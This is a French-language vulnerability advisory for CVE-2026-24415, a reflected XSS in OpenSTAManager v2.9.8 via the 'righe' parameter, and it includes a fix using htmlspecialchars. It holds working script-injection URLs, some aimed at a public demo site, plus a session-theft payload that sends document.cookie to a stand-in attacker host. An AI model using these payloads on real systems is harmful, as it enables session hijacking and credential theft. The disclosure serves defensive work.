
CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter
| Champ | Détails |
|---|---|
| Identifiant CVE | CVE-2026-24415 |
| Sévérité | MOYENNE |
| Avis de sécurité | Consulter l'avis |
| Découvert par | Lukasz Rybak |
De multiples vulnérabilités de type Cross-Site Scripting (XSS) reflété dans OpenSTAManager v2.9.8 permettent à des attaquants non authentifiés d'exécuter du code JavaScript arbitraire dans le contexte du navigateur d'autres utilisateurs via des paramètres d'URL spécialement conçus, pouvant conduire au détournement de session, au vol d'identifiants et à des actions non autorisées.
Paramètre vulnérable : righe (GET)
OpenSTAManager v2.9.8 contient de multiples vulnérabilités de type XSS reflété dans les fenêtres modales de modification des factures/commandes/contrats. L'application ne filtre pas correctement l'entrée fournie par l'utilisateur via le paramètre GET righe avant de la refléter dans la sortie HTML.
Emplacement du code vulnérable :
Fichier : /modules/contratti/modals/modifica_iva.php (Ligne 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
Le paramètre $_GET['righe'] est directement affiché dans l'attribut value HTML sans aucune neutralisation via htmlspecialchars() ou fonctions équivalentes. Cela permet à un attaquant de sortir du contexte de l'attribut et d'injecter du HTML/JavaScript arbitraire.
Tous les fichiers concernés :
/modules/contratti/modals/modifica_iva.php - Ligne 125, Ligne 167/modules/preventivi/modals/modifica_iva.php - Ligne 125, Ligne 167/modules/fatture/modals/modifica_iva.php - Ligne 121, Ligne 161/modules/ddt/modals/modifica_iva.php - Ligne 125, Ligne 167/modules/ordini/modals/modifica_iva.php - Ligne 125, Ligne 167/modules/interventi/modals/modifica_iva.php - Ligne 125, Ligne 167Prérequis :
Étape 1 : Connexion
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Étape 2 : Déclencher la XSS Naviguez vers l'URL suivante dans un navigateur (ou utilisez curl avec les cookies) :
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
URL testées (toutes vulnérables) :
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Résultat attendu : Une boîte de dialogue d'alerte JavaScript s'affiche montrant le cookie de session actuel, confirmant l'exécution du code.
Sortie HTML (vérifiée sur instance active) :
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Vérification :
Charges utiles alternatives :
Vol de session : "><script>fetch('https://attaquant.com/?c='+document.cookie)</script>
Utilisateurs concernés : Tous les utilisateurs authentifiés ayant accès aux modules de contrats, factures, devis ou commandes.
Scénario d'attaque :
Correctif recommandé :
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Appliquez ce correctif à tous les fichiers concernés listés dans la section Détails.
Cette CVE a été divulguée de manière responsable conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici sont à des fins éducatives et défensives uniquement.